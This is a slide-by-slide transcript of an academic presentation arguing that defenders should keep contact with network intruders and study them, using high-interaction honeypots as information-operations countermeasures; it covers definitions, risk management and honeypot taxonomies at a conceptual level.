Engaging the Adversary as a Viable Response to Network Intrusion - PowerPoint PPT Presentation

1 / 21
About This Presentation
Title:

Engaging the Adversary as a Viable Response to Network Intrusion

Description:

Engaging the Adversary as a Viable Response to Network Intrusion ... We're going to hold onto him by the nose, and we're going to kick him in the ass. ... – PowerPoint PPT presentation

Number of Views:45
Avg rating:3.0/5.0
Slides: 22
Provided by: sylvain8
Category:

less

Transcript and Presenter's Notes

Title: Engaging the Adversary as a Viable Response to Network Intrusion


1
Engaging the Adversary as a Viable Response to
Network Intrusion
  • Sylvain P. Leblanc G. Scott Knight
  • Workshop on Cyber Infrastructure and Emergency
    Preparedness

2
Another title
We're going to hold onto him by the nose, and
we're going to kick him in the ass.
General George S. Patton England, May 31 1944
3
1 - Introduction
The standard response predicated on Protect,
Detect and React is no longer sufficient.
It is important to gain information about those
who threaten the infrastructure.
4
Outline
  • Information Operations
  • Honeypots
  • Honeypots as IO Counter-measures Tools
  • Conclusion

5
2 - Information Operations (IO)
  • IO are defined as actions taken in support of
    political and military objectives which influence
    decision makers by affecting others information
    while exploiting, or fully utilizing, ones own
    information

6
Offensive IO
Actions taken to influence adversary
decision- makers, with the aim of preventing
adversary decision-making processes from
achieving their desired result.
7
Defensive IO
Actions taken to protect ones own information,
so that friendly decision-makers can have timely
access to necessary, relevant, and accurate
information.
  • Protection
  • Defensive Counter-Information Operations (IO
    Counter-measures)
  • Offensive Counter-Information Operations

8
Signals Intelligence (SigInt)
  • Intelligence derived from electromagnetic
    communications and communications systems, by
    other than the intended recipients or users.

9
Computer Network Operations (CNO)
  • CNO represent all aspects of computer related
    operations, but they have three specific
    components
  • Defence (CND)
  • Attack (CNA)
  • Exploitation (CNE)

10
Network-based IO counter-measures response to
Attack
Within the context of CNE and CNE operations,
the protection of the cyber infrastructure could
be enhanced by developing an effective
network-based IO counter- measures response to
attacks.
11
Operational Objectives
  • Holding Contact with the Adversary
  • Understanding the Adversary
  • Who is attacking?
  • What are they capable of?
  • What are their current mission and objectives?
  • What is the context of the current attack.
  • Preparing the Adversary

12
Network-based IO counter-measures Principles of
Operations
  • Operational Objectives for Active Response
  • Combined Operations
  • Repeatable Operations
  • Risk Management

13
Risk Management
  • Access risks
  • Damage or alter information
  • Exfiltrate more sensitive information than
    expected
  • Push attack to other systems
  • Mount IO counter-counter-measure
  • Denial implications
  • Inability to identify
  • Loss of knowledge on techniques and motivations
  • Loss of ability to influence
  • Encourage adversary to seek other ingress points

14
3 - Honeypots
  • Stem from the difficulty in discriminating
    attacker activity
  • A honeypots value lies in being probed, attacked
    and compromised.
  • Honeypots have no production value, making
    discrimination of attacker activity trivial.
  • Credited with many successes.

15
Honeypot Classifications
  • Spitzner suggests two main purposes
  • Production honeypots
  • Research honeypots
  • Taxonomie
  • Brenton - classified by the tools used
  • Spitzner - classified by level of interaction the
    attacker is permitted.

16
Brentons Taxonomy
  • Deception Services
  • Weakened Systems
  • Hardened Systems
  • User Mode Servers

17
Honeypot Levels of Interaction
Spitzners Taxonomy is based on the level of
interaction afforded to the attacker.
18
4 - Honeypots as IO Counter-measures Tools
  • Operational use with very high interaction
  • The attacker must feel that he is in a real
    production environment
  • High fidelity environment
  • New tools
  • Provide legitimate operational activity
  • Capture attackers activity

19
Characteristics of Honeypot based IO
Counter-measures Tools
  • Components and mechanisms undetectable from user
    with root privileges.
  • Behaviours and communication patterns appear
    legitimate from vantage point of other host on
    the network.
  • Able to simulate normal human user at the
    interface level.
  • Provide means of observing and collecting
    attacker activity
  • Make de-conflicting attack traffic
    straightforward.

20
5 - Conclusion
  • Reactive-oriented defence policy is insufficient.
  • Defence must include an understanding of the
    adversary.
  • First response should not always be to break
    contact
  • IO Counter-measures to gain information
  • Principles of Operations for Network-based IO
    counter-measures
  • Operational Objectives
  • Key Research Areas include honeypot based tools.

21
5 - Conclusions
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "Engaging the Adversary as a Viable Response to Network Intrusion" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!